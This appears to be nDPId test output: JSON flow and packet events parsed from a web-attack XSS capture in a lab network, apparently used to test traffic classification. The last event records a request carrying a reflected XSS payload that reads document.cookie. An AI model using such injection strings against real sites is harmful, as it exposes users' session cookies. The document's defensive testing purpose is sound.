-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347160581,"flow_last_seen":1499347165659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347160581,"flow_last_seen":1499347165659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347164459,"flow_last_seen":1499347169660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347164459,"flow_last_seen":1499347169660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347285114,"flow_last_seen":1499347285114,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347285114,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1499347285114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347285114,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AAxAAD4GxcSsEAABwKgKMtkMAFDF1B3mAAAAAKACchCCyAAAAgQFtAQCCAoBOh3qAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1499347285114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347285114,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2Qzzh7fuxdQd56AScSDk7AAAAgQFtAQCCAoD4+9gATod6gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2646,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1499347285115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347285115,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AA1AAD4GxcusEAABwKgKMtkMAFDF1B3n84e374AQAOWD9AAAAQEICgE6HeoD4+9g"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347286403,"flow_last_seen":1499347286403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347286403,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1499347286403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347286403,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8meVAAD4GK+usEAABwKgKMtkaAFAW6IbJAAAAAKACchDHgQAAAgQFtAQCCAoBOh8sAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2656,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":2,"flow_last_seen":1499347286403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347286403,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2Rp9ePmhFuiGyqAScSBcwAAAAgQFtAQCCAoD4\/CiATofLAEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2657,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":3,"flow_last_seen":1499347286404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347286404,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0meZAAD4GK\/KsEAABwKgKMtkaAFAW6IbKfXj5ooAQAOX7xwAAAQEICgE6HywD4\/Ci"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347287659,"flow_last_seen":1499347287659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347287659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1499347287659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347287659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA814FAAD4G7k6sEAABwKgKMtkoAFDVWPfnAAAAAKACchCWqgAAAgQFtAQCCAoBOiBmAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":2,"flow_last_seen":1499347287659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347287659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2Sh6EWHG1Vj36KAScSDF8QAAAgQFtAQCCAoD4\/HcATogZgEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":3,"flow_last_seen":1499347287660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347287660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA014JAAD4G7lWsEAABwKgKMtkoAFDVWPfoehFhx4AQAOVk+QAAAQEICgE6IGYD4\/Hc"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347290163,"flow_last_seen":1499347290163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347290163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1499347290163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347290163,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D11AAD4GtnOsEAABwKgKMtlCAFDDfi2FAAAAAKACchBwWwAAAgQFtAQCCAoBOiLYAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2686,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":2,"flow_last_seen":1499347290164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347290164,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ULBAUn+w34thqAScSBuCAAAAgQFtAQCCAoD4\/ROAToi2AEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":3,"flow_last_seen":1499347290164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347290164,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D15AAD4GtnqsEAABwKgKMtlCAFDDfi2GwQFJ\/4AQAOUNEAAAAQEICgE6ItgD4\/RO"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347291442,"flow_last_seen":1499347291442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347291442,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1499347291442,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347291442,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88hpAAD4G07WsEAABwKgKMtlQAFCuf9YCAAAAAKACchDbjgAAAgQFtAQCCAoBOiQYAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":1499347291443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347291443,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2VCY8a8grn\/WA6AScSCa6QAAAgQFtAQCCAoD4\/WOATokGAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":3,"flow_last_seen":1499347291443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347291443,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08htAAD4G07ysEAABwKgKMtlQAFCuf9YDmPGvIYAQAOU58QAAAQEICgE6JBgD4\/WO"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347292725,"flow_last_seen":1499347292725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292725,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1499347292725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347292725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Az5AAD4GwpKsEAABwKgKMtleAFDMWSZmAAAAAKACchBsAwAAAgQFtAQCCAoBOiVYAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1499347292725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347292725,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2V6LTEh8zFkmZ6AScSCeZwAAAgQFtAQCCAoD4\/bOATolWAEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1499347292726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347292726,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Az9AAD4GwpmsEAABwKgKMtleAFDMWSZni0xIfYAQAOU9bgAAAQEICgE6JVkD4\/bO"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347165741,"flow_last_seen":1499347171660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347165741,"flow_last_seen":1499347171660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347168302,"flow_last_seen":1499347173661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347168302,"flow_last_seen":1499347173661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54322,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347169573,"flow_last_seen":1499347174661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347169573,"flow_last_seen":1499347174661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54336,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347172098,"flow_last_seen":1499347177661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347172098,"flow_last_seen":1499347177661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347173373,"flow_last_seen":1499347178662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347173373,"flow_last_seen":1499347178662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2730,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347295224,"flow_last_seen":1499347295224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347295224,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1499347295224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347295224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CihAAD4Gu6isEAABwKgKMtl4AFDbgS3hAAAAAKACchBS1QAAAgQFtAQCCAoBOifJAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":2,"flow_last_seen":1499347295224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347295224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2XjDo5gx24Et4qAScSD6uwAAAgQFtAQCCAoD4\/k\/ATonyQEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":3,"flow_last_seen":1499347295224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347295224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CilAAD4Gu6+sEAABwKgKMtl4AFDbgS3iw6OYMoAQAOWZwwAAAQEICgE6J8kD4\/k\/"} 
-01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347291442,"flow_last_seen":1499347295227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347295227,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27JUL2D3WXHEGWRAFJE2PI7OS71Z4Z8RFUHXGNFLUFYVP6M3OL55%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 